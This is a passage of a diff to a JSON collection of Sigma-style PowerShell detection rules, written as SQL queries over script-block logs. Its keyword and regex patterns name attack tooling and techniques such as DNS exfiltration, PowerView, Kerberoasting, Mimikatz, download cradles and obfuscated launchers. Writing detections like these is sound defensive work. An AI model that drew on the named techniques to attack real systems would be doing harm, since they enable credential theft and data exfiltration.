ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Malicious PowerView 
PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + 
"filename": "posh_ps_get_childitem_bookmarks.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6454,9 +6025,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { "title": "Troubleshooting Pack Cmdlet Execution", 
@@ -6478,77 +6049,81 @@ "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "status": "test", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", "author": "frack113", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_download_com_cradles.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf 
(source), Florian Roth (Nextron Systems)", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { "title": "WMIC Unquoted Services Path Lookup - PowerShell", 
@@ -6570,661 +6145,630 @@ "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Powershell File and Directory Discovery", - "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "status": "test", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_file_and_directory_discovery.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { 
- "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "id": "88f0884b-331d-403d-a3a1-b668cf035603", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_susp_ad_group_reco.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious GPO Discovery With Get-GPO", - "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "status": "experimental", - "description": "Detect use of Get-GPO to get one GPO or all the 
GPOs in a domain.", + "title": "Suspicious Connection to Remote Account", + "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "status": "test", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_gpo.yml" + "filename": "posh_ps_susp_networkcredential.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "status": "test", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1070.003" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 